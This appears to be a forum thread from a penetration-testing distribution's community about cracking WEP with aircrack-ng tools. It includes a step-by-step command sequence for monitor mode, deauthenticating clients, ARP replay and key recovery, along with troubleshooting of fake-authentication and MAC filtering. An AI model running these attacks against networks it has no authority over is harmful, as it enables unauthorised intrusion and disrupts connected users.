Results 1 to 10 of 10

Thread: Wireless Cracking WEP + Slow gathering IV's

  1. #1
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    8

    Default Wireless Cracking WEP + Slow gathering IV's

    I have a rausb0 card and when i follower xplotiz tutorial everything works except when i try and crack the wep key.

    For some reason i get IV's really slowly like 20 in 5 minutes.

    Is this because my network does not have much traffic?
    and if this is true how can i increase the traffic without logging into it?

  2. #2
    Junior Member
    Join Date
    Feb 2008
    Posts
    36

    Default

    http://forums.remote-exploit.org/showthread.php?t=9063

    Also, make certain that your wnic supports injection and is in monitor mode.

  3. #3
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    19

    Default

    Many factors can slow you down. Your proximity to the access point is one. Another rather foolish mistake I have made in the past is not specifying a channel. This will cause you to collect the packets you want intermittently slowing you down greatly. And to continue with what GunMonkey asked, what is the result of the following command:

    Code:
    bt ~ # aireplay-ng -9 rausb0

  4. #4
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    8

    Default

    Thanks for your replay. I think my problem is just there is no traffic so i have to wait awhile

  5. #5
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    19

    Default

    As long as there is one client associated with that network you can gather enough IVs to crack it in say...under a minute. What you need to do (which I am sure is explained clearly in the tutorial) is find the client associated with the AP and de-authenticate him\her. This will force the reconnect and allow you to replay the ARP requests that follow next. Here are the EXACT steps I used to crack my WEP.

    Code:
    1: bt ~ # ifconfig rausb0 up
    2: bt ~ # iwconfig rausb0 mode monitor channel *channel* rate 1m
    3: bt ~ # iwpriv rausb0 forceprism 1
    4: bt ~ # iwpriv rausb0 rfmontx 1
    5: bt ~ # airodump-ng --channel *channel* -b *00:bssid:00* -w *capfile* rausb0
    6: bt ~ # aireplay-ng -0 5 -a *00:bssid:00* -c *00:client mac:00* rausb0
    7: bt ~ # aireplay-ng --arpreplay -b *00:bssid:00* -h *mac of associated client* rausb0
    8: bt ~ # aircrack-ng -z -b *00:bssid:00* *capfile*.cap
    NOTE: It may be necessary to set your MAC to that of the client you wish to disassociate from the AP. It was not necessary for me and I don't really see why it would be but others claim it is.

    Obviously the starred text are variables, set them to the appropriate values. Lines 1-4 put a Ralink USB dongle into monitor mode assuming you are using the correct drivers and configuration (line 4 is important for the replay attack). Backtrack 2 does NOT have the right configuration for Ralink by default (BT3b does).

    Keep in mind I was about 4 feet away from the router so obviously the signal strength was not a limiting factor.

    Let me know how this works out for you.

  6. #6
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    22

    Default

    Hello,
    i have a rausb device too but i`m having dificulties in cracking wep ..meaning my auth/deauth is not working ...i`m next to my ap wich is a d-link and when i type :

    aireplay-ng -1 0 -a (bssid) -h (mac adress of client) rausb0 it says :

    Sending autentication request (Open System) a few times and then :
    Attack was unsuccessful ..

    1.i`m very close to the ap so distance isn`t a problem
    card supports injection
    i think mac filtering is off but if it was on couldn`t i still auth/deauth using a cloned mac ?
    i`ll look in the d`link`s settings and see if filtering is on or off ..

    also tried the wesside-ng but i get the error max retransmits for 30 bytes and wheni tried the -k 1 solution it says invalid option --k ......

  7. #7
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    8

    Default

    Quote Originally Posted by ne0_ang3lz View Post
    Hello,
    i have a rausb device too but i`m having dificulties in cracking wep ..meaning my auth/deauth is not working ...i`m next to my ap wich is a d-link and when i type :

    aireplay-ng -1 0 -a (bssid) -h (mac adress of client) rausb0 it says :

    Sending autentication request (Open System) a few times and then :
    Attack was unsuccessful ..
    I think you problem is it is ment to go
    aireplay-ng -1 0 -a (mac address of cilent) -h (Your rausb0 mac address) rausb0

  8. #8
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    19

    Default

    Ok so what are the errors you are getting when you type in the commands I posted? You are using the commands I posted, aren't you?

    Which Backtrack are you using? 2 or 3b? If you are using 2 see this thread.


    Quote Originally Posted by ne0_ang3lz View Post
    ...i think mac filtering is off but if it was on couldn`t i still auth/deauth using a cloned mac ?...
    You "think mac filtering is off?" Haha, it's your AP, so log in and check it out. Turn it off if it is giving you a problem and see how you do without it.

  9. #9
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    22

    Default

    i am using the correct commands ...
    yes it is my AP , but i didn`t know where mac filtering was that`s why i said i don`t know for shure ...i watched the settings more carefully and the macfilter was on , i turned it off and now it works ...but i get iv`s really slowly and there arren`t enough to crack the wep key ...i`ll put something to download on my client and make some traffic and see how that goes ...

  10. #10
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    8

    Default

    Quote Originally Posted by ne0_ang3lz View Post
    i am using the correct commands ...
    yes it is my AP , but i didn`t know where mac filtering was that`s why i said i don`t know for shure ...i watched the settings more carefully and the macfilter was on , i turned it off and now it works ...but i get iv`s really slowly and there arren`t enough to crack the wep key ...i`ll put something to download on my client and make some traffic and see how that goes ...
    Or u can wait 10 mins and it will have enough

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •